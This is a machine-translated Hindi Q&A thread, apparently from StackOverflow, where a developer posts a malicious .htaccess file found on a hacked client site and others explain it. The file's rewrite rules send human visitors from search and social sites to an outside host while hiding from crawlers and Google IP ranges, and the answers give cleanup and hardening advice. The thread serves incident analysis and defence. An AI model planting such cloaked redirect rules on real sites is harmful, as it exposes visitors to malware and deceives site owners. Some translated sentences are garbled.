2012-12-12 36 views
7

हमारे ग्राहकों की साइटों में से एक हैक किया गया है और .htaccess फ़ाइलों को निम्न के साथ बदल दिया गया है।क्लाइंट साइट की एचटीएसीएसी हैक की गई - पूरी तरह से यह सुनिश्चित नहीं है कि यह क्या करता है या यहां से क्या करना है

क्या कोई भी यह कर सकता है कि यह वास्तव में क्या कर रहा है?

मेरे ज्ञान से ऐसा लगता है कि यह रेफ़रल पृष्ठ ले रहा है, फिर उपयोगकर्ता एजेंट, यह jpg नामक एक कुकी सेट करता है और फिर आपको siknsty.malicioussite.com पर रीडायरेक्ट करता है जो आपको वापस संदर्भित करने से पहले कुछ मैलवेयर डाउनलोड करने का प्रयास करता है मूल रेफरर्स साइट (इसलिए आपका पथ Google> मैलवेयर पेज> Google है)

यदि jpg कुकी सेट है तो यह आपको कहीं भी संदर्भित नहीं करता है क्योंकि यह मानता है कि आपके पास पहले से ही मैलवेयर डाउनलोड हो चुका है। (यह गलत हो सकता है - मुझे लगता है कि इसे आपको नीचे सूचीबद्ध पृष्ठों पर संदर्भित करना चाहिए जहां यह रीडायरेक्ट करता है)।

मैं बाकी के बारे में यकीन नहीं है या अगर यह .htaccess का उपयोग करता jpgs के रूप में ज़िप फ़ाइलों से नकाब (मुझे लगता है कि मुझे लगता है कि सही पढ़ रहा हूँ) ...

कोई भी विचार किसी को?

इसके अलावा, किसी भी विचार से यह सर्वर पर कैसे आया? सभी के लिए अनुमतियां 0644 पर सेट की गई थीं, और यह एक ही खाते के तहत विंडोज और लिनक्स सर्वर दोनों पर हुई है।

बुधवार सुबह बल्लाचे अहो।

ओह और उस साइट पर न जाएं।

<IfModule prefork.c> 
RewriteEngine On 
RewriteCond %{REQUEST_METHOD} ^GET$ 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?  (tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.).*$ [NC,OR] 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?(hi5\.|blogspot\.|friendfeed\.|friendster\.|google\.).*$ [NC,OR] 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?(yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.).*$ [NC,OR] 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?(aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.).*$ [NC,OR] 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?(lycos\.|metacrawler\.|mail\.|pinterest|instagram).*$ [NC] 
RewriteCond %{HTTP_REFERER}  !^.*(imgres).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|IRIX|Jakarta|JetBrains).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|macDN|Mediapartners|Megite|MetaProducts).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC] 
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC] 
RewriteCond %{REMOTE_ADDR}  !^66\.249.*$ [NC] 
RewriteCond %{REMOTE_ADDR}  !^74\.125.*$ [NC] 
RewriteCond %{HTTP_COOKIE}  !^.*Jpg.*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} .*(Windows|Macintosh|iPad|iPhone|iPod|Android).* [NC] 
RewriteCond %{HTTPS}  ^off$ 
RewriteRule .* - [E=Jpg:%{TIME_SEC}] 
RewriteRule .* - [E=HjT:siknsty.autoeventregistration.com] 

RewriteCond %{ENV:Jpg} 0 
RewriteRule ^.* http://%{ENV:HjT}/lg.php?bannerid=2168&campaignid=1049&zoneid=54&loc=1&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=3dc202f6d9 [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9516:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 1 
RewriteRule ^.* http://%{ENV:HjT}/www/app_full_proxy.php?app=275724075798066&v=1&size=z&cksum=e086bd606215518aed83711368bbecf5&src=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11607:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 2 
RewriteRule ^.* http://%{ENV:HjT}/__utm.gif?utmwv=5.3.3&utms=10&utmn=620248474&utmhn=malang.olx.co.id&utme=8(2!entryPage)9(2!jobs/staticsearch/190\%3Fsearchbox\%3Dretailer\%26section\%3Dst-190)11(2!1)&utmcs=UTF-8&utmsr=1024x768&utmvp=1024x638&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.3\%20r181&utmdt=Gambar\%20MAZDA\%20MR\%20TAHUN\%201992.\%20BIRU\%20-\%20Malang\%20-\%20Mobil&utmhid=312516024&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=vehicles/itemimages/withImg/0&utmac=UA-1240664-1&utmcc=__utma\%3D209359949.1036501994.1340939688.1340939688.1340955051.2\%3B\%2B__utmz\%3D209359949.1340955051.2.2.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dgambar\%2520mobil\%2520mazda\%2520th\%25201992\%3B&utmu=ujGgAAAAIAAAAAAAAAAAAAB~ [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9398:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 3 
RewriteRule ^.* http://%{ENV:HjT}/_xhr/ugccomments/?method=get_context_uuid&context_id=8064b73e-890d-3876-9ce5-c5f7c98574aa&0.2617028157370842&baseurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9127:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 4 
RewriteRule ^.* http://%{ENV:HjT}/ping?h=thefrisky.com&p=/photos/357-12-stars-who-regret-having-plastic-surgery/lisa-rinna-lips-m-jpg-2/&u=i5r1cquurwfzcui1&d=thefrisky.com&g=25328&n=1&f=1&c=0&x=114&y=1865&w=638&j=45&R=1&W=0&I=0&E=0&v=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&b=4187&t=72n4jkji2m79sf6m&V=6&D=nygdmayh2yyvp9w3&i=12\%20Stars\%20Who\%20Regret\%20Having\%20Plastic\%20Surgery\%20Lisa\%20Rinna\%20\%E2\%80\%93\%20The\%20Frisky&_ [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11948:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 5 
RewriteRule ^.* http://%{ENV:HjT}/__utm.gif?utmwv=5.3.2&utms=3&utmn=490784565&utmhn=www.wego.co.id&utme=8(2!Hotels*Google\%20search\%20position)9(2!Details\%20Overview*5)&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x612&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=11.2\%20r202&utmdt=Aston\%20Cengkareng\%20City\%20Hotel\%20\%26\%20Conference\%20Center\%2C\%20Jakarta\%20-\%20Bandingkan\%20tarif\%20kamar\%20-\%20Wego.co.id&utmhid=1324439502&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/hotel/indonesia/jakarta/aston-cengkareng-city-hotel-and-conference-center--133090&utmac=UA-29994605-1&utmcc=__utma\%3D1.786375144.1340094774.1340094774.1340094774.1\%3B\%2B__utmz\%3D1.1340094774.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dstandard\%2520superior\%2520twin\%2520room\%2520aston\%2520hotel\%3B&utmu=qzGggCAAAAAAAAAAAAAAAAB~ [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:10955:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 6 
RewriteRule ^.* http://%{ENV:HjT}/delivery/lg.php?bannerid=30550&campaignid=4402&zoneid=1917&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=dbd1f7d293 [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9621:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 7 
RewriteRule ^.* http://%{ENV:HjT}/api/getCount2.php?cb=stButtons.processCB&refDomain=www.mangahere.com&refQuery=manga/fly_high/v03/c013/37.html&pgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pubKey=e47efe7d-147b-4731-ac42-9838ccdc52f2&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:10798:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 8 
RewriteRule ^.* http://%{ENV:HjT}/pingjs/?k=f6ckilz7r2ss&t=Komik\%20Fairy\%20Tail\%20\%7C\%20Chapter\%20288\%20289\%20Hal\%2016\%20-\%20Baca\%20Manga\%20Bahasa\%20Indonesia\%20Online&c=s&y=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&a=-1&r=978836 [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11234:/:0:HttpOnly] 
<!-- Conditions 10 - 58 removed to post on stackoverflow --> 
RewriteCond %{ENV:Jpg} 59 
RewriteRule ^.* http://%{ENV:HjT}/delivery/lg.php?bannerid=31662&campaignid=2&zoneid=1884&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=af167e7f1f [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9285:/:0:HttpOnly] 

</IfModule> 
#a77342b1677255ef6afc9a0dbec166f633c2b44166559458c71fb4e7 

उत्तर

8

यह समय के दूसरे आधार पर यादृच्छिक पर रीडायरेक्ट में से एक को चुनने है। इसलिए वे 0 से 59 तक क्यों जाते हैं।

मुझे लगता है कि आप सही हैं कि यह एक कुकी सेट करता है ताकि यह वही पीड़ित व्यक्ति को वही काम न करे।

नियमों का पहला समूह ऐसी चीजें कर रहा है जैसे कि .jpg, .zip, आदि में समाप्त होने वाली फ़ाइल का अनुरोध करने वाले सभी को समाप्त करना संभवतः यह सुनिश्चित करने के लिए कि कोई वास्तव में इसे रीडायरेक्ट करने से पहले ब्राउज़र पर देख रहा हो। UserAgents भी बहिष्करण हैं (प्रत्येक पंक्ति की शुरुआत में ध्यान दें) - विभिन्न वेब मकड़ियों के साथ-साथ कुछ ऑपरेटिंग सिस्टम और क्लाइंट जिन्हें इसमें दिलचस्पी नहीं है या संक्रमित नहीं हो सकता है। यह भी उपयोगकर्ता-एजेंट की आवश्यकता है

Windows|Macintosh|iPad|iPhone|iPod|Android 

में से एक और संदर्भ शामिल करने के लिए लोकप्रिय साइटों और खोज इंजनों के नाम की एक लंबी सूची में से एक है। यह सुनिश्चित करने के लिए फिर से किया जा सकता है कि ब्राउज़र के पीछे एक इंसान है यदि वे स्पैम पर भुगतान कर रहे हैं या यह आपकी साइट का उपयोग करने से संबंधित हो सकता है उदाहरण के लिए खेती पर क्लिक करें।

RewriteCond %{REMOTE_ADDR}  !^66\.249.*$ [NC] 
RewriteCond %{REMOTE_ADDR}  !^74\.125.*$ [NC] 

ये इतना है कि साइट के मालिकों (संभावित) क्षति यह नोटिस नहीं है, या, साइट के पते शामिल हो सकता है:

एक दिलचस्प बात आईपी ब्लॉक की सूची है कि यह ध्यान नहीं देता है आपको यह पता चल सकता है कि आपके हमलावर किस देश में हैं।

+0

आप विवरण के लिए बहुत बहुत धन्यवाद। – user1897900

+0

तथ्य यह है कि .htaccess फ़ाइलों को बदल दिया गया था, यह सुझाव दे सकता है कि हमलावरों के पास केवल ग्राहक के उपयोगकर्ता नाम तक पहुंच थी या केवल निर्देशिकाओं के उस सेट तक। अगर उनके पास रूट पहुंच थी या कहीं भी फाइलें लिख सकती थी तो शायद वे कुछ और खराब कर सकते थे। – jwg

2

प्रत्यक्ष/विकृत हमले होने की बजाय, यह चुपचाप मैलवेयर पेश करने का एक चालाक तरीका है जो अंतिम उपयोगकर्ता के लिए स्पष्ट नहीं है।

ऐसा लगता है कि यह समय पर आधारित यादृच्छिक रूप से साइकिल चल रहा है ...(आप स्पष्ट रूप से समझने के लिए किसी तरह कर रहे हैं जो):

  1. नीचे साइट लो जब तक आप इसे समझते हैं
  2. तुलना करें/हाल ही में बैकअप से पुनर्स्थापित करना और देखना और क्या आपके सिस्टम
  3. भर में बदल दिया गया है आपकी लॉग फ़ाइलों
  4. लॉक सभी सर्वर आधारित खातों और चक्र सभी पासवर्ड
  5. चेक

वहाँ सहित संभव तरीकों से ऐसा हुआ है, के एक नंबर रहे हैं:

+०१२३५१६४१०६१
  1. एक सर्वर खाता ब्रूट-मजबूर किया गया है (उदा। एक एफटीपी/टेलनेट/उपयोगकर्ता या अन्य आम खाता)
  2. आपके कोड ने एक छेड़छाड़ प्रदान की है/जिसके माध्यम से किसी ने पहुंच प्राप्त की है (हालांकि यदि आपकी अनुमतियां 644 पर सेट की गई हैं तो संभवतः उन्होंने रूट/उपयोगकर्ता खाता किसी भी तरह से पहुंच प्राप्त की है या वे फ़ाइलों को ओवरराइट करने में सक्षम नहीं होंगे)।
  3. तारीख सॉफ्टवेयर (सुरक्षा छेद (रों) के साथ) का शोषण किया गया है में से
  4. एक असुरक्षित उपयोगकर्ता खाता सत्र

यहाँ कुछ आम तत्व मदद करने के लिए इस तरह के कारनामे से बचने कर रहे हैं पर पिग्गी समर्थित है, हालांकि आप linux को लॉक करने के लिए वेब पर सुरक्षा के तरीके ढूँढ सकते हैं/जीत सर्वर: कुंजी सिस्टम फ़ाइलों पर

  • स्थापित कर रहा है tripwires (एक खुला स्रोत विकल्प:)
  • स्थापित कर रहा है सॉफ्टवेयर/secur ity अद्यतन (Secunia नए मुद्दों की एक लंबे समय से स्रोत है)
  • निकाला जा रहा है/stoping सभी अनावश्यक खातों/सेवाओं
  • अपने नेटवर्क के किनारे पर हार्डवेयर का उपयोग करना (जैसे बाहरी उपयोग से अपने सर्वर की रक्षा के लिए। बुद्धिमान सुरक्षा सुविधाओं के साथ रूटर - हालांकि यह महंगा) है
  • स्थिर IP से सर्वर तक पहुँच को अवरुद्ध करने कमजोरियों अपने सर्वर (रों) है कि खोजने के लिए और उन्हें
  • बंद करने के लिए उन है कि आप
  • आचार प्रवेश के परीक्षण का उपयोग के अलावा अन्य पर्वतमाला
  • n की कोशिश करता iptables का उपयोग कर या एक बराबर के बाद खातों पर प्रयास को अवरुद्ध करके बाहरी पहुंच निकालें
+1

ग्रेट - आपकी सलाह के लिए बहुत बहुत धन्यवाद। मैं इस समय सर्वर की पूरी प्रतिलिपि खींच रहा हूं और सलाह के साथ ग्राहक के पास वापस आऊंगा। – user1897900